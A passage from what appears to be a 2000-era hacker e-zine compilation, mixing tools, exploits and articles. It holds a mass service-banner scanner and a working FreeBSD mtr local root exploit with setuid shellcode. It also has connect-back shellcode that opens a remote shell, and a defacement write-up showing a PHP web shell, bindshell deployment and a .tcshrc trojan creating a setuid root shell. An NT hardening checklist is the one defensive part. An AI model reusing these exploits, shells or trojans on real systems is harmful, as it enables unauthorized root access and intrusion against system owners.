if (th->syn)
for (i = 0; i < DECOYS; i++)
syndecoy (s);
else if ((!th->fin) && (!th->rst))
idscrew (s);
}
memset (packet, 0, 1024);
}
return 0;
}
/* $t34lthy OoOoO .
h4x3r _______( o__ o
|___\ 0|_ | _ ( _| O
/ 0|___||_O(___| ( 1 4m h1d1ng!@$ ) */
@HWA
26.0 [b0f] lscan2.c Lamerz Scan, a small fork()ing scanner..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. used to log bind, pop3, imap, etc banners from many
hosts quickly.
/* lscan2.c - 1999 (c) Mixter */
/* compile: gcc -O3 -s -Wall lscan2.c -o lscan */
#define INITIAL_TIMEOUT 5 // how long to wait for a connection
#define WAIT_FORK 550000 // wait 1/2 second between forks
#define BIND "ns.log"
#define POP "pop.log"
#define IMAP "imap.log"
#define RPC "mountd.log"
#define FTP "ftp.log"
#define STATUSLOG "status.log"
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#define SSA sizeof(struct sockaddr)
#define SOX socket(AF_INET,SOCK_STREAM,0)
int s1,s2,s3,s4,s5;
int ncon(int tsock, char *ip, int port, int timeout);
void invoke(struct hostent *host, int port); // udp send
void usage(char *name, char *text); // print usage & die
int validip(char *ip); // check and correct ip address
void fchk(FILE *fp); // check a file
void timedout(int sig); // dummy function
int background(); // background a process
void scan0r(char *ip); // log services for one ip
char buf[75]; // read the first 75 chars from a server
int main(int argc,char **argv)
{
FILE *data,*err;
char ip[30];
int pid;
if((argc!=2)) usage(argv[0],"<ipfile>");
fprintf(stderr,"[0;34mlamerz scan 1.0 by [5mMixter[0m\n");
fprintf(stderr,"[0;34mscanning from %s (pid: %d)[0m\n"
,argv[1] ,(pid=background()));
signal(SIGHUP,SIG_IGN);
signal(SIGCHLD,SIG_IGN); // zombies suck
fchk(data=fopen(argv[1],"r"));
fchk(err=fopen(STATUSLOG,"a"));
fprintf(err,"Started new session. File: %s, PID: %d\n",argv[1],pid);
while(!feof(data))
{
fscanf(data,"%s\n",ip);
if(validip(ip)==1)
{
usleep(WAIT_FORK); // wait between fork()'s (1/2 second default)
if ((pid=vfork()) < 0) { perror("fork"); exit(1); }
if (pid==0) // child
{
scan0r(ip); // collect data for this host & save into files
raise(9);
return 0;
}
}
else fprintf(err,"Invalid IP: %s\n",ip);
}
sleep(60); // wait for the last childs
fprintf(err,"Finished session. File: %s\n",argv[1]);
return 0;
}
void scan0r(char *ip)
{
int tout=INITIAL_TIMEOUT,
s1=SOX,s2=SOX,s3=SOX,s4=SOX,s5=SOX,
bind,pop,imap,rpc,ftp;
FILE *f1,*f2,*f3,*f4,*f5;
fchk(f1=fopen(BIND,"a"));
fchk(f2=fopen(POP,"a"));
fchk(f3=fopen(IMAP,"a"));
fchk(f4=fopen(RPC,"a"));
fchk(f5=fopen(FTP,"a"));
rpc=ncon(s4,ip,635,tout); // we check port 635 because 2.2b29
// mountd always binds on that one
if(rpc==-9) return; // host timed out
else if(rpc>=0) fprintf(f4,"%s\n",ip); // log mountd connect
pop=ncon(s2,ip,110,tout);
if(pop==-9) return; // host timed out
else if(pop>=0)
{
bzero(buf,sizeof(buf));
read(s2,buf,sizeof(buf)); // get popper version
fprintf(f2,"%s %s\n",ip,buf); // log popper connect
}
pop=ncon(s2,ip,109,tout);
if(pop==-9) return; // host timed out
else if(pop>=0)
{
bzero(buf,sizeof(buf));
read(s2,buf,sizeof(buf)); // get popper version
fprintf(f2,"%s !POP2! %s\n",ip,buf); // log popper connect
}
imap=ncon(s3,ip,143,tout);
if(imap==-9) return; // host timed out
else if(imap>=0)
{
bzero(buf,sizeof(buf));
read(s3,buf,sizeof(buf)); // get imap version
fprintf(f3,"%s %s\n",ip,buf); // log imap connect
}
bind=ncon(s1,ip,53,tout);
tout -= 2; // wait 2 seconds less
if(bind==-9) return; // host timed out
else if(bind>=0) // log dns connect
fprintf(f1,"%s\n",ip);
ftp=ncon(s5,ip,21,tout);
if(ftp==-9) return; // host timed out
else if(ftp>=0)
{
bzero(buf,sizeof(buf));
read(s5,buf,sizeof(buf)); // get ftp version
fprintf(f5,"%s %s\n",ip,buf); // log ftp connect
}
fclose(f1); fclose(f2); fclose(f3); fclose(f4); fclose(f5);
raise(9);
return;
}
int ncon(int tsock, char *ip, int port, int timeout) {
int probe;
struct sockaddr_in target;
target.sin_family = AF_INET;
target.sin_port = htons(port);
target.sin_addr.s_addr = inet_addr(ip);
bzero(&target.sin_zero,8);
alarm(0); signal(SIGALRM,timedout); alarm(timeout);
probe = connect(tsock, (struct sockaddr *)&target, SSA);
alarm(0);
if(probe < 0) {
close(tsock);
if(errno == EINTR) return -9;
if(errno == ETIMEDOUT) return -9;
}
return probe;
}
void usage(char *name,char *text)
{
printf("usage: %s %s\n",name,text);
exit(EXIT_FAILURE);
}
int validip(char *ip)
{
int a,b,c,d,*x;
sscanf(ip,"%d.%d.%d.%d",&a,&b,&c,&d);
x=&a;
if(*x < 0) return 0; if(*x > 255) return 0;
x=&b;
if(*x < 0) return 0; if(*x > 255) return 0;
x=&c;
if(*x < 0) return 0; if(*x > 255) return 0;
x=&d;
if(*x < 0) return 0; if(*x > 255) return 0;
sprintf(ip,"%d.%d.%d.%d",a,b,c,d); // truncate possible garbage data
return 1;
}
void fchk(FILE *fp)
{
if(fp==NULL)
{
fprintf(stderr,"Error opening file or socket.\n");
exit(EXIT_FAILURE);
}
return;
}
void timedout(int sig)
{
alarm(0);
raise(9);
}
int background()
{
int pid;
signal(SIGCHLD,SIG_IGN);
pid = fork();
if(pid<0) return -1; // fork failed
if(pid>0)
{
sleep(1);
exit(EXIT_SUCCESS); // parent, exit
}
if(pid==0)
{
signal(SIGCHLD,SIG_DFL);
return getpid(); // child, go on
}
return -2; // shouldnt happen
}
@HWA
27.0 [b0f] Pseudo Cryptographic Filesystem..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. Creates a fake CFS directory that is indistinguishable from real ones
/*
* pcfs - pseudo cryptographic file system
* (c) 2000 by Mixter
*
* This tool just creates a recursive directory and file structure
* that contains purely random data, but is indistinguishable from a
* encrypted CFS directory, unless an extensive cryptanalysis is performed.
* This can be taken as a proof that a strange directory cannot easily be
* proven to actually contain encrypted data. May be useful against f3dz,
* just for decoy purposes, or to keep people from analyzing your
* cryptographic file systems structure. Distributed according to the GPL.
*
* WARNING: THIS PROGRAM IS SUBJECT TO PSEUDO-CRYPTOGRAPHIC EXPORT
* CONTROLS AND US-RESTRICTIONS AGAINST RANDOM DATA! =P
* This code was reviewed and approved by the SCC (sloppy code commission)
* gcc -Wall -O2 pcfs.c -o pcfs
*/
#include <stdio.h>
#include <string.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#define START_PATH "fake"
mode_t modes[7] =
{00755, 00644, 0000, 00664, 00700, 00777, 00444};
char chr[16] = "abcdef1234567890", rseed[65535], buffer[256];
char wd[200];
int rcounter = 0;
void random_init (void);
inline long gr (int, int);
char *rname (void);
mode_t rmode (void);
void mkfiles (void);
void mkd (char *, int);
int
main (void)
{
printf ("Creating fake file system in %s/%s, press a key\n",
getcwd (wd, 200), START_PATH);
(void) getchar ();
printf ("Hit CTRL+C to stop - creating files");
if (!geteuid ())
setpriority (PRIO_PROCESS, 0, -10);
mkd (START_PATH, 0);
return 0;
}
void
mkd (char *dirname, int forking)
{
printf (".");
fflush (stdout);
if (forking)
if (fork ())
return;
mkdir (dirname, rmode ());
getcwd (wd, 200);
strcat (wd, "/");
strcat (wd, dirname);
chdir (wd);
if (forking)
mkfiles ();
else
{
char smbuf[32];
int a, f = open ("/dev/urandom", O_RDONLY);
read (f, smbuf, 32);
a = open ("...", O_WRONLY | O_CREAT | O_TRUNC, 00644); /* hash */
write (a, smbuf, gr (5, 10));
close (a);
sprintf (smbuf, "%ld", gr (1, 5));
a = open ("..c", O_WRONLY | O_CREAT | O_TRUNC, 00644); /* algorithm */
write (a, smbuf, strlen(smbuf));
close (a);
read (f, smbuf, 32);
a = open ("..k", O_WRONLY | O_CREAT | O_TRUNC, 00644); /* encrypted key */
write (a, smbuf, 32);
close (a);
close (f);
sprintf (smbuf, "%ld", gr (1000, 900000));
a = open ("..s", O_WRONLY | O_CREAT | O_TRUNC, 00644); /* session blah */
write (a, smbuf, strlen(smbuf));
close (a);
while (1)
mkfiles ();
}
}
void
mkfiles (void)
{
while (gr (0, 25))
if (!gr (0, 10))
mkd (rname (), 1);
else
{
int f = open ("/dev/urandom", O_RDONLY), x, y = gr (0, 65500);
char fname[256], fn2[256], big[65535];
memset (fname, 0, 256);
memset (fn2, 0, 256);
sprintf (fname, "%s", rname ());
sprintf (fn2, ".pvect_%s", rname ());
symlink (fname, fn2);
x = open (fname, O_RDWR | O_CREAT, rmode());
read (f, big, y);
write (x, big, y);
close (f);
close (x);
}
}
char *
rname (void)
{
int i;
memset (buffer, 0, 256);
for (i = 0; i < gr (5, 150); i++)
buffer[i] = chr[gr (0, 15)];
return buffer;
}
mode_t
rmode (void)
{
return (modes[gr (0, 6)]);
}
void
random_init (void)
{
int rfd = open ("/dev/urandom", O_RDONLY);
if (rfd < 0)
rfd = open ("/dev/random", O_RDONLY);
rcounter = read (rfd, rseed, 65535);
close (rfd);
}
inline
long
gr (int min, int max)
{
if (rcounter < 2)
random_init ();
srand (rseed[rcounter] + (rseed[rcounter - 1] << 8));
rcounter -= 2;
return ((random () % (int) (((max) + 1) - (min))) + (min));
}
@HWA
28.0 [b0f] mtr-0.41 (freebsd) local root exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* mtr-0.41 (freebsd) local root exploit */
/* (c) 2000 babcia padlina / buffer0verfl0w security (www.b0f.com) */
#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <string.h>
#define NOP 0x90
#define BUFSIZE 10000
#define ADDRS 1200
long getesp(void)
{
__asm__("movl %esp, %eax\n");
}
int main(argc, argv)
int argc;
char **argv;
{
char *execshell =
//seteuid(0);
"\x31\xdb\xb8\xb7\xaa\xaa\xaa\x25\xb7\x55\x55\x55\x53\x53\xcd\x80"
//setuid(0);
"\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80"
//execl("/bin/sh", "sh", 0);
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
char buf[BUFSIZE+ADDRS+1], *p;
int noplen, i, ofs;
long ret, *ap;
if (argc < 2)
{
fprintf(stderr, "usage: %s ofs\nusually offset = 4000\n",
argv[0]);
exit(0);
}
ofs = atoi(argv[1]);
noplen = BUFSIZE - strlen(execshell);
ret = getesp() + ofs;
memset(buf, NOP, noplen);
buf[noplen+1] = '\0';
strcat(buf, execshell);
setenv("EGG", buf, 1);
p = buf;
ap = (unsigned long *)p;
for(i = 0; i < ADDRS / 4; i++)
*ap++ = ret;
p = (char *)ap;
*p = '\0';
fprintf(stderr, "ret: 0x%x\n", ret);
setenv("TERMCAP", buf, 1);
execl("/usr/local/sbin/mtr", "mtr", 0);
return 0;
}
@HWA
29.0 [b0f] shellcode that connets to a host&port and starts a shell
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
Connecting shellcode written by lamagra <access-granted@geocities.com>
lamagra is a member of b0f/buffer0verfl0w security
http://lamagra.seKure.de - http://www.b0f.com
file "connect"
version "01.01"
text
.align 4
_start:
#socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
movl %esp,%ebp
xorl %edx,%edx
movb $102,%edx
movl %edx,%eax # 102 = socketcall
xorl %ecx,%ecx
movl %ecx,%ebx
incl %ebx # socket()
movl %ebx, -8(%ebp) # 1 = SOCK_STREAM
incl %ebx
movl %ebx, -12(%ebp) # 2 = AF_INET
decl %ebx # 1 = SYS_socket
movl %ecx, -4(%ebp) # 0 = IPPROTO_IP
leal -12(%ebp),%ecx # put args in correct place
int $0x80 # switch to kernel-mode
xorl %ecx,%ecx
movl %eax,-12(%ebp) # save the fd
# connect(fd,(struct sockaddr *)&struct,16);
incl %ebx
movw %ebx,-20(%ebp) # 2 = PF_INET
movw $9999,-18(%ebp) # 9999 = htons(3879);
movl $0x100007f,-16(%ebp) # htonl(IP)
leal -20(%ebp),%eax # struct sockaddr
movl %eax,-8(%ebp) # load the struct
movb $16,-4(%ebp) # 16 = sizeof(sockaddr)
movl %edx,%eax # 102 = socketcall
incl %ebx # 3 = SYS_connect
leal -12(%ebp),%ecx # put args in place
int $0x80 # call socketcall()
# dup2(fd,0)
xorl %ecx,%ecx
movb $63,%edx # 63 = dup2()
movl %edx,%eax
int $0x80
#dup2(fd,1)
movl %edx,%eax
incl %ecx
int $0x80
# arg[0] = "/bin/sh"
# arg[1] = 0x0
# execve(arg[0],arg);
jmp 0x18
popl %esi
movl %esi,0x8(%ebp)
xorl %eax,%eax
movb %eax,0x7(%esi)
movl %eax,0xc(%ebp)
movb $0xb,%al
movl %esi,%ebx
leal 0x8(%ebp),%ecx
leal 0xc(%ebp),%edx
int $0x80
call -0x1d
.string "/bin/sh"
*/
char code[]=
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee"
"\x0f\x27" // <-- port to connect to
"\xc7\x45\xf0"
"\x7f\x00\x00\x01" // <-- host to connect to
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0"
"\x43\x8d\x4d\xf4\xcd\x80\x31\xc9\xb2\x3f\x89\xd0\xcd\x80\x89\xd0"
"\x41\xcd\x80\xeb\x18\x5e\x89\x75\x08\x31\xc0\x88\x46\x07\x89\x45"
"\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08\x8d\x55\x0c\xcd\x80\xe8\xe3\xff"
"\xff\xff/bin/sh";
#define NAME "connecting"
main()
{
int (*funct)();
funct = (int (*)()) code;
printf("%s shellcode\n\tSize = %d\n",NAME,strlen(code));
(int)(*funct)();
}
@HWA
30.0 [b0f] NT Security check paper part 2 by Slash
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For buffer0verfl0w security
written by slash
tcsh@b0f.i-p.com
http://www.b0f.com
Windows NT Security Check Part II
=================================
Introduction
------------
In Part I of "Windows NT security Check" I explained some basic things about User accounts
and Logging options. In this part I'll try to explain varius Groups and User rights. Please
note that any of the topics provided in these articles can be discussed on our webboard
located at http://net-security.org/webboard.htm
Groups
------
The membership of groups should be carefully evaluated. A group that is granted
permissions to sensitive files might contain users that should not have that access.
Open each group listed in the User Manager and inspect its members.
- Carefully evaluate the members of management groups such as Administrators, Server
Operators, Account Operators, Backup Operators, and Print Operators. Remove all
unnecessary accounts.
- Make sure that all administrative users have two accounts: one for administrative
tasks and one for regular use. Administrators should only use their administrative
accounts when absolutely necessary.
- Evaluate each global group membership and the resources that the group has access to.
Does the group have access in other domains?
- What folders and files do groups have permission to access?
- Do local groups hold global groups from other domains? Check the membership of these
global groups and make sure that no users have unnecessary access to resources in the
current domain
The Administrator Account and Administrators Group
--------------------------------------------------
The Administrator account and Administrators group have unlimited rights on the system.
Therefore, you need to carefully evaluate the membership of the Administrators group
and take care of some other housekeeping related to the Administrator account:
- If you are taking over the management of an existing system, you should change the
Administrator account name and password immediately. You do not know who might have a
password that would give them access to the account.
- The Administrator account is often the target of attacks because of its well-known name.
You should rename the Administrator account to an obscure name and create a "decoy"
account called "Administrator" with no permissions. Intruders will attempt to break in
to this decoy account instead of the real account.
- Enable failed logons in the auditing system to detect attempts to log on to any account,
including Administrator.
- Look for unnecessary accounts that have Administrator status. Perhaps an intruder has
created such an account as a backdoor into the system.
The Administrators group has "Access this computer from network" right, which you can
block to prevent account hijacking or unauthorized activities. Without this right,
administrators must log on at the computer itself in a controlled environment to do any
administrative tasks. You will also need to remove the right from the Everyone group then
add back in accounts that are allowed to log on from network.
The Guest Account and Everyone Group
------------------------------------
Most administrators agree that it should be disabled, although removing it remove the
ability of anonymous users to access a system. If You decide to enable guest account
consider creating a separate domain for these public services where the Guest account
is enabled. Alternatively, use a Web server for this type of system.
- Users who log on as guests can access any shared folder that the Everyone group has
access to (i.e., if the Everyone group has Read permissions to the Private folder,
guests can access it with Read permissions).
- You don't know who Guest users are and there is no accountability because all guests
log in to the same account.
- If you have Microsoft Internet Information Server software installed, a special Guest
account called IUSR_computername exists with the rights to log on locally. Remove this
account if you don't want the general public to access your Web server. Users must then
have an account to access the Web server.
User rights
-----------
In the User Manager for Domains, check the rights that users and groups have on the
system. Choose User Rights from the Policies menu to display the User Rights Policy
dialog box. Initially, the box shows the basic rights. To evaluate all rights, click the
Show Advanced User Rights option. Here are some considerations for basic rights:
- Access this computer from the network
By default, only the Administrators and the Everyone group have this right. Remove
the Everyone group (why would you want everyone to access this server from the network
if you are interested in security?), then add specific groups as appropriate. For
example, create a new group called "Network Users" with this right, then add users who
should have network access.
- Backup files and directories
User's with this right can potentially carry any files off-site. Carefully evaluate which
users and groups have this right. Also evaluate the Restore files and directories right.
- Log on locally
For servers, only administrators should have this right. No regular user ever needs
to logon directly to the server itself. By default, the administrative groups
(Administrators, Server Manager, etc.) have this right. Make sure that any user who is
a member of these groups has a separate management account.
- Manage auditing and security logs
Only the Administrators group should have this right.
- Take ownership of files or other objects
Only the Administrators group should have this right.
Scan all the advanced rights to make sure that a user has not been granted rights
inappropriately.
Files, Folders, Permissions and Shares
--------------------------------------
This discussion assumes that you are only using NTFS volumes on your servers. Do not
use FAT volumes in secure installations.
To check permissions on folders and other resources, you must go to each resource
individually to review which users and groups have permissions. This can be a
bewildering task, so for large systems obtain a copy of the Somarsoft DumpACL utility.
To open the Permissions dialog box for a folder or file, right-click it and choose
Properties, then click either the Sharing or the Security tab. The Sharing options
show who has access to the folder over the network. The Security tab has the Permission
and Auditing buttons so you can check local permissions or set auditing options.
Start your evaluation with the most sensitive and critical folders if you are doing
this procedure manually or performing a periodic checkup. Take care to do the following:
- Check each folder and/or file to determine which local users and groups have access
and whether that access is appropriate.
- Check all shared folders and the share permissions
on those folders to determine which network users and groups have access and whether
that access is appropriate.
- Program files and data files should be kept in separate folders to make management
and permission setting easier. Also, if users can copy files into a data folder,
remove the Execute permission on the folder to prevent someone from copying and
executing a virus or Trojan Horse program.
- Separate public files from private files so you can apply different permission sets.
- If users or groups have access to a folder, should they have the same access to
every file in the folder? To every subdirectory? Check the sensitivity of files and
attached subdirectories to evaluate whether inherited permissions are appropriate.
- Keep in mind that the Everyone group gets Full access by default for all new folders
you create. To prevent this, change the Everyone group's permission for a folder,
then any new subdirectories you create will get the new permission settings.
- If the server is connected to an untrusted network such as the Internet, do not
store any files on the server that are sensitive and for in-house access only.
- Never share the root directory of a drive or one of the drive icons that appears in the
graphical display. An exception would be sharing a Read Only CD-ROM drive for public
access.
- For sensitive, password protected directories, enable Auditing. Right-click a folder,
click Security, then click Auditing and enable Failure to track users that are attempting
unauthorized access a folder or file. Note that File and Object access must be enabled
from the Audit Policies menu in the User Manager, as described later.
- Use encryption wherever possible to hide and protect files. Mergent
(http://www.mergent.com/) and RSA Data Systems (http://www.rsa.com/) provide encryption
software for this purpose.
You can remove Everyone's access to an entire folder tree by going to the root of the
drive, changing the permissions, and propagating those permissions to subdirectories.
Do not do this for the systemroot folder (usually C:\WINNT). You must manually update
Everyone's right there.
Virus and Trojan Horse Controls
-------------------------------
Viruses are a particularly serious problem in the network environment because the client
computer can become infected, transferring the virus to server systems. Other users may come
into contact with infected files at the server. Evaluate and set the following options:
- Program directories should have permissions set to Read and Execute (not Write) to
prevent a virus from being written into a directory where it can be executed. To install
programs, temporarily set Write on, then remove it.
- Install new software on a separate, quarantined system for a test period, then install
the software on working systems once you have determined that it is safe to run.
- Public file sharing directories should have the least permissions possible, i.e., Read
Only, to prevent virus infections.
- If a user needs to put files on your server, create a "drop box" directory that has
only the Write permission. Check all new files placed in this directory with a virus
scanner. Implement backup policies and other protective measures.
- Educate and train users.
- Check the Symantec (<http://www.symantec.com/>) site for interesting papers on
Windows NT-specific virus issues.
Auditing and Event Logs
-----------------------
Check the status of audit settings by choosing Audit on the Policies menu in the User
Manager for Domains. The Audit Policy dialog box appears. The settings in this box reflect
the minimum settings that are appropriate for auditing in most environments. Keep in mind
that auditing too many events can affect a system's performance.
Protect auditing and security logs from other administrators who might change or delete
them. You can grant only the Administrators group the ability to access the logs. To
restrict access to only one user (the "auditor"), remove all users except the auditor
from the Administrators group. This means all of your other administrators should be
members of a management group that does not have the "Manage auditing and security log"
right.
Check for failed logons in the Event Viewer. You can enable security auditing for logon
attempts, file and object access, use of user rights, account manage- ment, security
policy changes, restart and shutdown, and process tracking.
Backup
------
Backup policies and procedures are essential. In your evaluation, determine which users
belong to the Backup Operators group. Carefully evaluate if you trust these users. Backup
operators have the ability to access all areas of the system to back up and restore files.
Members of the Backup Operators group should have special logon accounts (not regular user a
ccounts) on which you can set logon restrictions. If Joe is the backup operator, he should
have a regular logon account for his personal activities and a special logon account for
backing up the system. Set restrictions on the backup account, then set restrictions that
force Joe to log on from a specific system only during appropriate hours. Change, with
frequency, the name and password of the account to guard against hijacking.
- Review the backup policies. Is the backup schedule appropriate? Are files safely
transported to secure backup locations? How might backup compromise the confidentiality
of files?
- View the Event Log to audit backup activities.
Final conclusion
----------------
Well, I hope that this articles gave You some basic info how to administrate Youre Windows NT
server. For more info I recomend reading the following books:
- Inside Windows NT Server 4 : Administrators Resource Edition
<http://www.amazon.com/exec/obidos/ASIN/1562057278/netsecurity>
This national bestseller has been updated and expanded to cover the most talked-about
Windows NT-related technologies and the latest information on Windows NT Server 4. Aimed
at network administrators, consultants, and IT professionals, this book provides invaluable
information to help you get up and running. Written by experts, this comprehensive book
takes you through the ins and outs of installing, managing, and supporting a Windows NT
network - with efficiency. Loaded with tutorials and organized as a reference, it's the
perfect resource for new administrators who need to get up to speed quickly, as well as
technically savvy and experienced administrators who just need to locate the most essential
information - without reading every page.
- Essential Windows NT System Administration
<http://www.amazon.com/exec/obidos/ASIN/1565922743/netsecurity>
Essential Windows NT System Administration helps you manage Windows NT systems as
productively as possible, making the task as pleasant and satisfying as can be. It
combines practical experience with technical expertise, helping you to work smarter
and more efficiently. It covers not only the standard utilities offered with the Windows
NT operating system, but also those from the Resource Kit, as well as important commercial
and free third-party tools. It also pays particular attention to developing your own
tools by writ
ing scripts in Perl and other languages to automate common tasks. This book
covers the workstation and server versions of Windows NT 4 on both Intel and Alpha
processor-based systems.
- Microsoft Windows NT 4.0 Security, Audit, and Control
<http://www.amazon.com/exec/obidos/ASIN/157231818X/netsecurity>
This "Security Handbook" is the official guide to enterprise-level security on networks
running Microsoft Windows NT Server 4.0 Written in collaboration between Microsoft and
MIS professionals at Coopers & Lybrand, here is the essential reference for any Windows
NT Server 4.0-based network.
This is only a small amount of book concerning Windows NT security and administration. You
can find more books on Windows NT at our online bookstore <http://net-security.org/books/>
Default newsletter (http://default.net-security.org)
@HWA
31.0 [IND] The apache.org hack. by {} and Hardbeat (Apr 4th 2000)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
How we defaced www.apache.org
by {} and Hardbeat
/*
* Before you start reading
*/
This paper does _not_ uncover any new vulnerabilities. It points out common
(and slightly less common) configuration errors, which even the people at
apache.org made. This is a general warning. Learn from it. Fix your systems,
so we won't have to :)
/*
* introduction
*/
This paper describes how, over the course of a week, we succeeded in
getting root access to the machine running www.apache.org, and changed
the main page to show a 'Powered by Microsoft BackOffice' logo instead
of the default 'Powered by Apache' logo (the feather). No other changes
were made, except to prevent other (possibly malicious) people getting in.
Note that the problems described in this paper are not apache-related,
these were all config errors (one of 'm straight from BugZilla's README,
but the README had enough warnings so I don't blame the BugZilla developers).
People running apache httpd do not need to start worrying because of
anything uncovered herein.
We hacked www.apache.org because there are a lot of servers running apache
software and if www.apache.org got compromised, somebody could backdoor
the apache server source and end up having lots of owned boxes.
We just couldn't allow this to happen, we secured the main ftproot==wwwroot
thing. While having owned root we just couldnt stand the urge to put that
small logo on it.
/*
* ftproot == wwwroot
* o+w dirs
*/
While searching for the laters apache httpserver to diff it the with
previous version and read that diff file for any options of new buffer
overflows, we got ourselves to ftp://ftp.apache.org. We found a mapping of
the http://www.apache.org on that ftp including world writable directories.
So we wrote a little wuh.php3 including
<?
passthru($cmd);
?>
and uploaded that to one of the world writable directories.
/*
* Our commands executed
*/
Unsurprisingly, 'id' got executed when called like
http://www.apache.org/thatdir/wuh.php3?cmd=id
Next was to upload some bindshell and compile it like calling
http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c and then
executing it like calling http://www.apache.org/thatdir/wuh.php3?cmd=./httpd
/*
* The shell
*/
Ofcourse we used a bindshell that first requires ppl to authenticate with
a hardcoded password (:
Now we telnet to port 65533 where we binded that shell and we have local
nobody access, because cgi is running as user nobody.
/*
* The apache.org box
*/
What did we find on apache.org box:
-o=rx /root
-o=rx homedirs
apache.org is a freebsd 3.4 box. We didn't wanted to use any buffer
overflow or some lame exploit, goal was to reach root with only
configuration faults.
/*
* Mysql
*/
After a long search we found out that mysql was
running as user root and was reachable locally. Because apache.org was
running bugzilla which requires a mysql account and has it
username/password plaintext in the bugzilla source it was easy to
get a username/passwd for the mysql database.
We downloaded nportredird and have it set up to accept connections on
port 23306 from our ips and redir them to localhost port 3306 so we could
use our own mysql clients.
/*
* Full mysql access
* use it to create files
*/
Having gained access to port 3306 coming from localhost, using the login
'bugs' (which had full access [as in "all Y's"]), our privs where
elevated substantially. This was mostly due to sloppy reading of the BugZilla
README which _does_ show a quick way to set things up (with all Y's) but
also has lots of security warnings, including "don't run mysqld as root".
Using 'SELECT ... INTO OUTFILE;' we were now able to create files
anywhere, as root. These files were mode 666, and we could not overwrite
anything. Still, this seemed useful.
But what do you do with this ability? No use writing .rhosts files - no
sane rshd will accept a world-writable .rhosts file. Besides, rshd
wasn't running on this box.
/*
* our /root/.tcshrc
*/
Therefore, we decided to perform a trojan-like trick. We used database
'test' and created a one-column table with a 80char textfield. A couple
of inserts and one select later, we had ourselves a /root/.tcshrc with
contents similar to:
#!/bin/sh
cp /bin/sh /tmp/.rootsh
chmod 4755 /tmp/.rootsh
rm -f /root/.tcshrc
/*
* ROOT!!
*/
Quite trivial. Now the wait was for somebody to su -. Luckily, with 9
people legally having root, this didn't take long. The rest is trivial
too - being root the deface was quickly done, but not until after a
short report listing the vulnerabilities and quick fixes was build.
Shortly after the deface, we sent this report to one of the admins.
/*
* Fix that ftproot==wwwroot
*/
Another thing we did before the deface, was creating a file 'ftproot' in
the wwwroot (which was also ftproot), moving 'dist' to 'ftproot/dist'
and changing the ftproot to this new 'ftproot' dir, yielding the
world-writable dirs unexploitable but allowing ftp URLs to continue
working.
/*
* What could have been compromised?
*/
Remember the trojaned tcp_wrappers on ftp.win.tue.nl last year? If we
wanted to, we could have done the same thing to Apache. Edit the source
and have people download trojaned versions. Scary, eh?
/*
* In short:
*/
- ftproot==webroot, worldwritable dirs allowing us to upload and execute
php3 scripts
- mysqld running as root, with a FULL RIGHTS login without a password.
/*
* Compliments for the Apache admin team
*/
We would like to compliment the Apache admin team on their swift
response when they found out about the deface, and also on their
approach, even calling us 'white hats' (we were at the most 'grey hats'
here, if you ask us).
Regards,
{} and Hardbeat.
{} (mailto:karin@root66.nl.eu.org) is part of
RooT66 - http://root66.nl.eu.org
ShellOracle - http://www.shelloracle.cjb.net
b0f - http://b0f.freebsd.lublin.pl
Hardbeat (petervd@vuurwerk.nl) just has a lame page at
http://www.dataloss.net/
In the media:
~~~~~~~~~~~~
Wired;
http://www.wired.com/news/politics/0,1283,36170,00.html
Apache Site Defaced by Michelle Finley
4:00 p.m. May. 5, 2000 PDT
While the rest of the world battled the "Love Bug" worm, free Web-server
software-provider Apache had problems of its own.
Due to system-level misconfigurations of ftpd and bugzilla, a hacker was
able to obtain a shell account and replace Apache's logo of a feather and
its "Powered by Apache" tagline with a Microsoft logo and credit.
"Yes, the www.apache.org site was penetrated," said Ken Coar, a director
and vice president of the Apache Software Foundation. "The penetration was
through some network services that were configured with an insufficient
degree of paranoia. The penetration was not through the Apache Web server
software nor any of the other Apache software, but through standard
network utilities found on virtually all Internet servers."
The people who penetrated the Apache.org system likely were "grey hats,"
Coar said. The hacker spectrum runs from "black hats," who would break in,
do damage, and attempt to avoid tracing, to "white hats," who would note
the configuration problems and let the site managers know about them
without taking advantage of them.
"These people fall into the 'grey area' in between because they told us
about the problems, but not until after they had utilized them to make
some apparently innocuous changes," he said.
Cruciphux, publisher of the security and hacking electronic zine
HWA.hax0r.news, ezine said the site was defaced around 6:37 p.m. EDT on
May 3 by hackers known as "{}" and "Hardbeat."
"{} belongs to Buffer Overflow Security, a fledgling security group
consisting of ex-hackers and including people such as "mixter," who wrote
